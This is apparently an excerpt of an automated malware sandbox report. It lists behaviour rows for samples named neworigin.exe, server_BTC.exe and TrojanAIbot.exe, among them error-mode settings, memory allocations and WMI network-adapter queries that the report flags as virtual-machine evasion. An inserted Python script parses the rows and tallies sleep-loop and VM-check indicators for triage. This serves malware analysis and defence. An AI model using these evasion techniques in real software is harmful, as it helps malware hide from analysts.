                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX (12 occurrences)
                      Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (2 occurrences)
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX (59 occurrences)
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX (15 occurrences)
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (2 occurrences)
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX (65 occurrences)
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX (15 occurrences)
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX (15 occurrences)
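
Rows of this report, when exported to text, tend to arrive with the process column run straight into the signature column and with the "Jump to behavior" link text appended, which makes per-process triage of hundreds of near-identical entries tedious. The script below is an added example, not Joe Sandbox code and not code from the sample: it splits such rows back into process, thread id, signature and detail, tallies them per process, and re-applies the thresholds the report prints inline (sleep count > 30, sleep time magnitude >= 30000, and WMI enumeration of Win32_NetworkAdapter classes, which the report's summary flags as a virtual machine check). The embedded rows are constructed in the shape of this report's entries, and the flag names are this example's own.

```python
"""Tally Joe Sandbox behaviour rows per process and re-apply the report's
evasion thresholds. Added example, not Joe Sandbox code. Assumption: rows
look like 'Source: <process>[ TID: n]<Signature>: <detail>', possibly with
the columns fused and 'Jump to behavior' link text appended."""
import re
from collections import Counter, defaultdict

# Constructed sample rows in the shape of this report's entries.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX",
    r"Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep count: 38 > 30Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -100000s >= -30000sJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 936Thread sleep count: 4722 > 30Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 4722Jump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477",
    r"Source: C:\Users\Public\Libraries\Wisrysxl.PIFAPI coverage: 10.0 %",
    "not a report row",
]

ROW_RE = re.compile(
    r"^Source:\s*"
    r"(?P<proc>[A-Za-z]:\\.*?\.(?:exe|pif|dll))"    # process path, ends at the first PE extension
    r"(?:\s*TID:\s*(?P<tid>\d+))?"                 # optional thread id column
    r"\s*(?P<sig>[A-Za-z][A-Za-z /]*?):\s*"          # signature name, up to the first colon
    r"(?P<detail>.*?)"
    r"(?:Jump to (?:behavior|dropped file))?\s*$",  # link text left over from the HTML report
    re.IGNORECASE,
)
SLEEP_COUNT_RE = re.compile(r"^(\d+)\s*>\s*(\d+)$")
SLEEP_TIME_RE = re.compile(r"^(-?\d+)s\s*>=\s*(-?\d+)s$")


def parse_row(line):
    """Split one row into its columns; returns None for lines that are not rows."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    row = m.groupdict()
    row["detail"] = row["detail"].strip()
    row["tid"] = int(row["tid"]) if row["tid"] else None
    return row


def evasion_flags(row):
    """Re-apply the thresholds the report prints next to each value."""
    sig, detail = row["sig"], row["detail"]
    flags = []
    if sig == "Thread sleep count":
        m = SLEEP_COUNT_RE.match(detail)
        if m and int(m.group(1)) > int(m.group(2)):
            flags.append("sleep-loop")
    elif sig == "Thread sleep time":
        # The report prints relative delays as negative values; compare
        # magnitudes against the threshold it shows (30000).
        m = SLEEP_TIME_RE.match(detail)
        if m and abs(int(m.group(1))) >= abs(int(m.group(2))):
            flags.append("long-sleep")
    elif sig == "WMI Queries" and "Win32_NetworkAdapter" in detail:
        flags.append("wmi-adapter-enum")  # adapter/MAC details, a common VM check
    return flags


def summarize(rows):
    """Per-process tallies: signature counts, evasion flag counts, thread ids seen."""
    out = defaultdict(lambda: {"signatures": Counter(), "flags": Counter(), "threads": set()})
    for line in rows:
        row = parse_row(line)
        if row is None:
            continue
        entry = out[row["proc"]]
        entry["signatures"][row["sig"]] += 1
        if row["tid"] is not None:
            entry["threads"].add(row["tid"])
        for flag in evasion_flags(row):
            entry["flags"][flag] += 1
    return dict(out)


if __name__ == "__main__":
    for proc, entry in summarize(SAMPLE_ROWS).items():
        print(proc)
        for sig, n in entry["signatures"].most_common():
            print(f"  {n:4d}  {sig}")
        if entry["flags"]:
            print("  flags:", dict(entry["flags"]), "threads:", sorted(entry["threads"]))
```

Feed it the text export of a whole report (one row per line) instead of SAMPLE_ROWS to get a per-process view of which binaries carry the sleep-loop and WMI indicators; rows the regex does not recognise are skipped rather than mis-attributed.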

                      Malware Analysis System Evasion

                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration (3 occurrences)
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 29A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2B70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 4B70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 1370000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 2E00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 13E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2C70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2E10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 4E10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: F10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 28F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 48F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: D30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2B10000 memory reserve | memory write watch
